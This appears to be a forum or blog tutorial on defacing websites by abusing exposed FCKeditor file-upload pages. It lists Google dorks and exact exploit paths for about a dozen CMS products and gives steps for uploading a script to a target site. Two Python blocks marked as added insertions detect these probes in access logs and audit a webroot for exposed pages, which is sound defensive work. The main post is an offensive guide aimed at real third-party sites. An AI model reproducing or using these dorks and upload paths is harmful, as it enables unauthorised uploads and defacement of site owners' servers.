Deface FCKeditor
Assalamu'alaikum wr.wb
Okay, let's get straight to the FCKeditor deface technique.
As usual, start by dorking on trusty old Google, always ready to serve 😂
Dork:
inurl:editor/filemanager/upload
Exploit: test.html
Alternatively, the dork and the exploit can be combined into one, so that you are taken straight to the file upload.
Example: inurl:editor/filemanager/upload/test.html
But REMEMBER!!
Not every dork and exploit can be combined.
Once you have found a vulnerable site, click ASP in the top-left corner and change it to PHP, then click choose file and send it to server.
If a message appears, click OK; that means the script file was uploaded successfully. Then copy the script's URL and paste it after the target site's address.
Example: sitetarget.co.li/your script URL
To make the steps easier, use this exploit:
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
And this is how to call the script:
Sitetarget.co.li/files/namascriptkamu.html
Easy, right?
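From the site owner's side, every step above leaves a trace in the web server access log. The following is an added example, not part of the original post: it flags requests to the FCKeditor file-manager paths named here and separates blind probes, sample pages that were actually served, and POSTs to a connector. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Directories and sample pages taken from the paths listed in the post.
FCK_DIR = re.compile(r'/editor/(filemanager|plugins/uploadme)/', re.I)
TEST_PAGE = re.compile(r'/(test|uploadtest|browser)\.html$', re.I)

def classify(line):
    """Return (ip, kind, path, status) for a file-manager request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target = m.group(1, 2, 3)
    status = int(m.group(4))
    path = urlsplit(target).path          # drop the query string
    if not FCK_DIR.search(path):
        return None
    if method == "POST":
        return ip, "upload-attempt", path, status
    if TEST_PAGE.search(path) and status == 200:
        return ip, "exposed-page", path, status   # page exists and was served
    return ip, "probe", path, status              # path guessing, e.g. 404/403

def summarize(lines):
    """Group findings per client IP, in log order."""
    out = defaultdict(list)
    for line in lines:
        hit = classify(line)
        if hit:
            out[hit[0]].append(hit[1:])
    return dict(out)

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:02:11:05 +0000] "GET /FCKeditor/editor/filemanager/browser/default/connectors/test.html HTTP/1.1" 404 162 "-" "-"',
    '203.0.113.7 - - [10/Mar/2024:02:11:06 +0000] "GET /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php HTTP/1.1" 200 2310 "-" "-"',
    '203.0.113.7 - - [10/Mar/2024:02:11:40 +0000] "POST /admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 200 120 "-" "-"',
    '198.51.100.20 - - [10/Mar/2024:02:12:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for ip, hits in summarize(SAMPLE_LOG).items():
        print(ip, [kind for kind, _path, _status in hits])
```

A client that moves from "probe" to "exposed-page" to "upload-attempt" within a short window is the sequence to alert on; any later GET for a new file in the upload directory confirms the upload landed.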
Below are a few more FCKeditor techniques ... Happy imagining 😂
1. Powered CubeCart. This is a module that allows defacing by file upload; we can use this method.
Dork: Powered By CubeCart V 3.0
Exploit: /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
Example: www.target.com/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
2. Powered By OpenCart
Dork: Powered By OpenCart
Exploit: admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Example: www.target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
3. Powered By OscMax V 2.0
Dork: Powered By OscMax V 2.0
Exploit: FCKeditor/editor/filemanager/browser/default/connectors/test.html
Example: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
4. Hacking TXT. This is the same as concept 3 above; the only difference is that only .txt files can be uploaded, and other file types will not be accepted.
Dork: Inurl:/FCKeditor/editor/filemanager/
Exploit: /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Example: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
5. GIOI PHANG (fckeditor) Arbitrary File Upload Vulnerability
Dork: intext:Powered (+) Designed THE GIOI PHANG Ltd.
Exploit: http://www.site.com//editor/filemanager/connectors/uploadtest.html
6. Cms Liquid Bubble - Fckeditor - Vulnerability
Dork: "Web design London: Liquid Bubble "
Exploit: http://www.site.com/editor/editor/filemanager/connectors/uploadtest.html
7. Webfactory n&p CMS (fckeditor) Arbitrary File Upload Vulnerability
Dork: inurl:pcms/content
Dork: by webfactory n&p
Exploit: http://www.site.com/[path]/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
8. Izrada (fckeditor) Arbitrary File Upload Vulnerability
Dork: intext:izrada web stranica: I.T.B.
Exploit: http://www.site.com/fckeditor/editor/filemanager/connectors/uploadtest.html
9. CMS Thea (fckeditor) Arbitrary File Upload Vulnerability
Dork: Designed by C.P.U. ZETO w Jeleniej Grze
Exploit: http://www.site.com/js/fckeditor/editor/filemanager/connectors/uploadtest.html
10. NETVIDADE CMS (FCKEDITOR) Arbitrary File Upload Vulnerability
Dork: "Desenvolvido por netvidade.com"
Exploit: http://www.site.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
11. Wordocs Israel FCKeditor Shell Upload Disclosure Vulnerabilities
Dork: inurl:/files/wordocs/ site:il
Exploit: /FCKeditor/editor/plugins/uploadme/fck_uploadme.php
12. FCKEDITOR
Dork: inurl:advert_detail.php?id=
Exploit: http://www.site.co.li/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
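For a site owner, the list above amounts to a checklist of files that should not be reachable on a production webroot. The following is an added example, not part of the original post: it walks a directory tree and reports leftover FCKeditor sample pages, the uploadme plugin script, and PHP connectors that are switched on. The `$Config['Enabled']` line in the connector's config.php is an assumption about the installed FCKeditor version, and the demo tree is constructed.

```python
import os
import re
import tempfile

SAMPLE_PAGES = {"test.html", "uploadtest.html", "browser.html"}  # named in the post
# Assumption: the PHP connector is switched on by this line in its config.php.
ENABLED_RE = re.compile(r"^\s*\$Config\[\s*'Enabled'\s*\]\s*=\s*true", re.I | re.M)

def audit_webroot(root):
    """Return sorted (finding, relative_path) pairs for exposed file-manager parts."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/").lower()
        in_fm = "editor/filemanager" in rel_dir
        in_plugin = rel_dir.endswith("editor/plugins/uploadme")
        if not (in_fm or in_plugin):
            continue
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            low = name.lower()
            if in_plugin and low.endswith(".php"):
                findings.append(("upload-plugin", rel))
            elif low in SAMPLE_PAGES:
                findings.append(("sample-page", rel))
            elif low == "config.php":
                with open(full, errors="replace") as fh:
                    if ENABLED_RE.search(fh.read()):
                        findings.append(("connector-enabled", rel))
    return sorted(findings)

def build_demo_tree(root):
    """Create a small constructed webroot so the audit can run offline."""
    base = "admin/FCKeditor/editor/filemanager/connectors/"
    files = {
        base + "test.html": "<html></html>",
        base + "php/config.php": "<?php\n$Config['Enabled'] = true ;\n",
        "js/fckeditor/editor/filemanager/connectors/php/config.php":
            "<?php\n$Config['Enabled'] = false ;\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        print(audit_webroot(tmp))
```

Each finding is a candidate for removal or for an access rule that restricts the file-manager directory to authenticated administrators.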
That is all I have to share.
My apologies for any shortcomings.
That's all, and thank you.
Signed: Jl_sutra
https://www.youtube.com/channel/UCFH6CnetBOuIJgnL5v8ySpQ
Please visit my friend's YouTube channel,
and don't forget to Like and Subscribe, masters 👻👻👻
Wassalamu'alaikum wr.wb